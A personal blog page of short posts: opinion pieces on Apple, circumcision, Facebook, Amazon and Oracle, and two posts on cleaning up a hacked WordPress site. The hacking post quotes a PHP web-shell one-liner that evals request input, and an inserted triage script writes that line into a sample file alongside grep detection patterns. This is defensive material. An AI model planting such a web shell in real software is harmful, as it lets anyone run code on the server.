Hashemian Blog
Web, Finance, Technology

Apple Discrimination

by @ 5:14 pm
Filed under: computers, politics

A few weeks ago my children dragged me into the local mall's Apple store, kicking and screaming, where I bought them each a MacBook, a cheap Linux knock-off in a shiny skin.

I am a devout Apple-hater and have been so since 1988 when I had to write a LISP program on a Macintosh desktop. Nothing this company does or produces has ever looked remotely exciting or interesting to me and let's not even get started with the ridiculous prices. I personally own nothing from this company and am proud of that fact.

I could have bought my children very nice Windows laptops at a third of the price, but that wasn't an option. Apple seems to have plenty of people under its spell. They can sell them street garbage stamped with the bitten-apple image like it's some magical product from Venus.

Since Apple has the policy of not selling to Iranian-Americans, I just wonder where the Apple police was on the day I wasted my hard-earned money on their junk.

Apple sucks. Always has, and probably always will.

Wordpress Base64 Hack or PHP-CGI Hack? part II

by @ 7:15 pm
Filed under: hacking, web

To be factual about it, my site was hacked twice in exactly the same way over a period of a couple of weeks. The first time around I noticed it when the feeds coming via Feedburner kept crashing the RSS readers because of a javascript malware block inserted right at the top of the feed. Turns out that the php files in my wordpress installation were altered to emit the offending javascript block.

Surely the hacker must have exploited some wordpress vulnerability, I thought. A quick search on the web for wordpress base64 hack brings up plenty of pages covering such hacking cases.

I started out by examining the MySQL tables by doing a global search for terms such as base64 or eval. The wp_options table had plenty of such entries. At first it seemed like I had found the hacker's stash. wp_options is where wordpress and the plugins save their parameter data. There were also lots of entries with the "transient" keyword. In the end they turned out to be innocuous. Transients could become real nuisances, but that's a different topic.

With the database search behind me, I put the focus on the files. Deep searching for base64_decode and eval produced a number of files. Here's a simple command to achieve this search:

$ grep -rl base64_decode *

Some of the hits were legitimate, but eventually I ran into two types of files that were obvious hacks. The first type were mostly legitimate index.php files that had been altered with a giant code block right at the top. The blocks were of the base64_decode(eval(long-hex-string)); variety. Removing the block appeared to restore the files back to their original form. The other type were small-sized php files with varied names containing one or two lines of code like eval(stripslashes($_REQUEST['a']));. This code would basically execute raw code passed in as a parameter to the page, very simple, very effective, and very dangerous.

Armed with that knowledge I went snooping around the site looking for small-sized files and any files that had been altered recently.

$ find . -name '*.php' -size -1025c
$ find . -name '*.php' -mtime -7

The first command returns php files that are 1 KB or less in size (the name pattern is quoted so the shell doesn't expand it, and the size is given in bytes because find rounds sizes up to whole units, so -size -1k would only match empty files). The second returns php files that were modified in the last 7 days. I dug through the long list of files, fixed the altered files by removing the malicious code blocks and then deleted the small dropped-in files.
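The grep for base64_decode and eval and the two find commands above are really one triage pass, so here is an added shell script that combines them; it is not a script from the post or from WordPress. It assumes POSIX find and grep, prints each finding as a reason label and a path, and builds its own constructed sample tree (placeholder file names and a base64 string that merely encodes the text "constructed-placeholder") so it runs offline.

```shell
#!/bin/sh
# Added example, not from the blog post: one-pass triage of a PHP tree that
# combines the post's grep and find searches. Every finding is printed as
# "<reason><TAB><path>" so the list can be sorted, diffed or kept as a record.
# Usage: scan_php_tree DIR [DAYS]   (DAYS defaults to 7, as in the post)

# Prefix every line on stdin with a reason label (tab-separated output).
tag() {
    while IFS= read -r path; do
        printf '%s\t%s\n' "$1" "$path"
    done
}

scan_php_tree() {
    dir="$1"
    days="${2:-7}"
    # 1. The injected header the post found at the top of index.php files.
    find "$dir" -type f -name '*.php' \
        -exec grep -l 'eval[[:space:]]*([[:space:]]*base64_decode' {} + \
        | tag injected-base64-block
    # 2. Dropped-in one-liners that eval raw request input.
    find "$dir" -type f -name '*.php' \
        -exec grep -lE 'eval[[:space:]]*\([^)]*\$_(REQUEST|GET|POST)' {} + \
        | tag eval-of-request-input
    # 3. Small PHP files (1 KB or less). Compare in bytes: find rounds sizes up
    #    to whole units, so "-size -1k" would only match empty files.
    find "$dir" -type f -name '*.php' -size -1025c | tag small-file
    # 4. PHP files modified in the last N days.
    find "$dir" -type f -name '*.php' -mtime "-$days" | tag recently-modified
}

# Build a constructed sample tree so the scan can be exercised offline.
# File names and payloads are placeholders, not indicators from a real incident.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-includes" "$root/wp-content/uploads"
    # A legitimate include: well over 1 KB and not touched for years.
    {
        printf '<?php\n// constructed stand-in for a normal WordPress include\n'
        i=0
        while [ "$i" -lt 40 ]; do
            printf 'function helper_%s($x) { return htmlspecialchars($x); }\n' "$i"
            i=$((i + 1))
        done
    } > "$root/wp-includes/clean.php"
    touch -t 202001010000 "$root/wp-includes/clean.php"
    # index.php with a block of the first kind prepended; the base64 string
    # decodes to the text "constructed-placeholder", nothing else.
    printf '<?php eval(base64_decode("Y29uc3RydWN0ZWQtcGxhY2Vob2xkZXI=")); ?>\n' > "$root/index.php"
    printf '<?php\nrequire __DIR__ . "/wp-blog-header.php";\n' >> "$root/index.php"
    # A dropped-in file of the second kind (constructed file name).
    printf '<?php eval(stripslashes($_REQUEST["a"])); ?>\n' > "$root/wp-content/uploads/x7q.php"
    printf '%s\n' "$root"
}

# Demo run: build the constructed tree, scan it, clean up.
demo_root=$(make_sample_tree)
scan_php_tree "$demo_root"
rm -rf "$demo_root"
```

On a real install the labels are a triage list, not a verdict: as the post notes, some base64_decode hits are legitimate, and every small or recently modified file still has to be opened and compared against a clean copy of the same WordPress version. The injected index.php in the sample deliberately shows up under three labels at once; files that stack several reasons are the ones to look at first.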

Finally I upgraded the wordpress installation to the latest version and everything was back to good, or so I thought. Within about two weeks I was hacked again in almost the same way as the first time. How did I recover from it and plug the hole? Hint: PHP was the actual culprit. Stay tuned …

German court bans male circumcision

by @ 11:00 pm
Filed under: religion, Uncategorized

Nothing like baby penis mutilation to bring Jews and Muslims together. Kudos to this court for banning baby circumcision.

Religious Rite?
-Feel free to cut it off when you're an adult and can make a free choice.

Infection prevention?
-How about general hygiene?

HIV prevention?
-Ever heard of a condom?

German court bans male circumcision, sparks outrage among Jews, Muslims

Wordpress Base64 Hack or PHP-CGI Hack?

by @ 10:57 pm
Filed under: hacking, web

A couple of months ago I started noticing that this blog's RSS feed, which is via Feedburner, wasn't coming through on some RSS readers. After some tests I discovered that the feed actually contained a malicious javascript block at the top. That was breaking the XML format, causing the RSS readers to fail. Turns out that it was my own site that was hacked, replicating over to Feedburner.

After a bit of investigating I found a number of files, especially those named index.php, that had been modified by a code block at the top that started with something like "eval(base64_decode(…" followed by a long string of hex numbers. I decoded the hex string and I ended up with a php code block that looked pretty devious with references to Chinese sites.

This is what was happening. A blog page is accessed by a user. Since most Wordpress activity is funneled through the index.php file the malware at the top is executed and after a couple of iterations a javascript block is produced and sent to the browser. No idea what the javascript code was doing, but safe to assume its goal was to infect the users with malware, steal data and eventually turn them into zombies in some botnet.

Do a search for Wordpress base64 hack and you'll find thousands of sites around addressing this issue. Wordpress doesn't exactly have a good security reputation but its latest versions were thought to be more secure. But in this case Wordpress wasn't at fault. Turns out the real culprit was php-cgi 5.3.5 and a nasty security hole stretching back for 8 years. The bug would allow the attacker to view the source code of a page, run arbitrary code, and generally be a pain in the a$$.

I suspect in some cases where Wordpress (or Joomla or Drupal or phpMyAdmin) has been hacked, the true culprit has been php-cgi. The reason these popular programs are targets is that their structures and operations are well-known to all, including the hackers. All it takes to exploit vulnerable sites is to write simple scripts targeting known pages and let them loose on the internet. The robot crawls around infecting sites as it finds them, and then those infected sites infect their users by extension. An old concept, but pretty neat in a distorted sort of a way.

There are some questions to be answered here. Why was such a gaping hole allowed to remain in php for 8 years? Why was it publicized before it could be plugged? Why do some sites still use CGI? After all, this vulnerability didn't affect php run as a module. Those are good questions and there are plenty of discussions about them online, so no need to rehash here.

What might be useful is explaining what I did to plug this hole on my site. Stay tuned …

Oracle's Java Bet

by @ 6:40 pm
Filed under: business, google, technology

A couple of weeks ago a judge finally ruled that Google hadn't violated any patents when it used the Java programming language in its Android OS. Good, finally someone wasn't intimidated by Larry Ellison and ruled based on logic rather than emotion. Word has it that the judge actually took some time to learn Java to have a better grasp of the dispute, impressive.

Now comes the news that Android has hit 900k activations per day and is well on its way to reach 1m per day. That may be in part due to some confidence that Android is now a safe bet, free from Oracle's licensing threats.

In retrospect, it’s easy to see why Oracle acquired Sun and its assets. Even if some of those assets, like Java or MySQL, were under GPL (essentially free to use), that's counter to how Oracle operates. Oracle had hoped, and still does, to start capitalizing on the large market shares of these products. To that end it hasn't been successful, yet.

The latest Java lawsuit outcome is a great boon to developers and users, but one shouldn't bank on Oracle's defeat in Android's case as being the end of such tactics. Undoubtedly Oracle will be back for more. Given its past business history, Oracle is nothing if not undaunted and persistent.

What's Facebook Worth?

by @ 9:51 pm
Filed under: financial, web

I can't possibly be the only one who's had a perverse pleasure in seeing Facebook's stock slide after the much ballyhooed IPO. It's not like I wish the company bad fortune or dislike its boss, although I don't think much of Facebook as a product nor do I use it much. It's just that something so hyped and overblown seems so out of touch with reality that one doesn't want to see it take off like it's 1999, especially if one is not along for the ride.

Given the nearly daily declines of Facebook's stock, one does however wonder where the bottom of this stock really is. At the current level of $29, it probably doesn't have much further to go, give or take a couple of dollars. At the same time something tells me that the big investors are just waiting to pounce on the stock once they believe it has sufficiently deflated.

Us mortals will know where that bottom is long after it has passed, but if one can time a purchase somewhere near that bottom, chances are that it will pay off handsomely. There's probably a lot of money on the sidelines waiting to get in and when that happens the stock would snap back with a vengeance.

Forget valuations and future earnings. This one seems to be going on pure psychology right now. Hell, even I'm thinking about getting in 🙂

Facebook IPO Price Clamp

by @ 12:53 pm
Filed under: financial

Seems like everything was on hold yesterday except for the Facebook stock price gyrations. In the end it eked out a measly 23 cents over its IPO price of $38 and that with some grand assistance from its underwriters and backers.

That assistance was so obvious, especially towards the end of the trading session. You could tell the stock really wanted to break below $38, but every time it touched that price it was nudged back up. Looked totally artificial and trigger-directed. Obviously the bankers didn't want to look foolish by having the stock close below the IPO price. That would have meant that they didn't do their homework. At least this way they can claim they priced it in the Goldilocks zone, not too hot, not too cold, but just right.

Well, the founder and a bunch of other people that matter became uber-wealthy yesterday and there's still a chance that the stock may get its footing and actually climb. Sure, it's an expensive stock with the P/E ratio currently at 122, but Amazon's P/E is an astounding 175. Going by Amazon's measure, Facebook should at least be worth $55 per share.

Amazon's Ridiculous P/E

by @ 11:09 pm
Filed under: financial, web

Yeah I know, P/E ratio is so old school but as I read the post below I was blown away by how ridiculous Amazon's P/E ratio of 184 actually is.

For a quick verification I went down a list of stocks I follow and none even came close to that figure. Even Priceline, with its unbridled share price growth, has a P/E of 34. The rest of them average somewhere in the teens.

Granted, Amazon is the number 1 online retailer, sells a nifty reader and a tablet, is a cloud computing pioneer, and is trying to break into the high fashion market, but 184?

Maybe if it were a startup with expectations of explosive growth in a year or two, that figure could be justified. But Amazon, at nearly 20 years old, is hardly a new kid on the block.

How is AMZN worth 13 AAPLs? - Apple 2.0 - Fortune Tech

Amazon, Target, and Showrooming

by @ 10:47 pm
Filed under: financial, internet, law

Last week came the news that Target stores will no longer carry Amazon's Kindle readers. The bold move was basically a retaliatory reaction by Target to what is known as showrooming.

Showrooming is how Amazon encourages its users to visit various physical stores, check out or even try out various merchandise and then go back to Amazon to order them for cheaper prices. In a sense Amazon uses the physical stores as showrooms for free and that creates an unfair advantage in favor of Amazon.

Sure, people can visit Amazon's site too to shop around, but a page visit costs Amazon a tiny fraction of a penny while a shopper roaming the aisles of a store, and especially inspecting and trying various items, could cost the stores multiple dollars.

Target may feel good about removing Kindles from its shelves but that maneuver will be but a blip on Amazon's bottom line. Making the playing field fair will be a tall order, but for starters Amazon should be required to collect sales taxes on all items sold. If there's heavy resistance, then stores should be exempt from collecting sales taxes as Amazon is.

Paying sales taxes on Amazon purchases will not be popular, but if Amazon is allowed to push physical stores out of business through the unfair loopholes, that will result in a monopoly, and there's little doubt that its pricing policy will not be favorable by any measure once the competition is wiped out.

Who's the real prostitute?

by @ 4:36 pm
Filed under: social

Every time a woman is labeled a prostitute (like the story below) it irks me to no end. The word has such a negative and insulting connotation, its liberal usage should be avoided.

So these women sell sexual services. What exactly is wrong with that, if they're of age and not forced into it? Before you judge these women on moral grounds, consider how many wives would deny their husbands sex, if their men stopped lavishing them on holidays or birthdays.

A bunch of cheap and perverted men on a presidential trip tricked these women and stole services from them, and the women are the prostitutes? The real prostitutes are those pathetic men and the media for demeaning these women.

Open Channel - Prostitute at center of Secret Service scandal: 'I would have been able to get any information'.

© 2001-2021 Robert Hashemian   Powered by Hashemian.com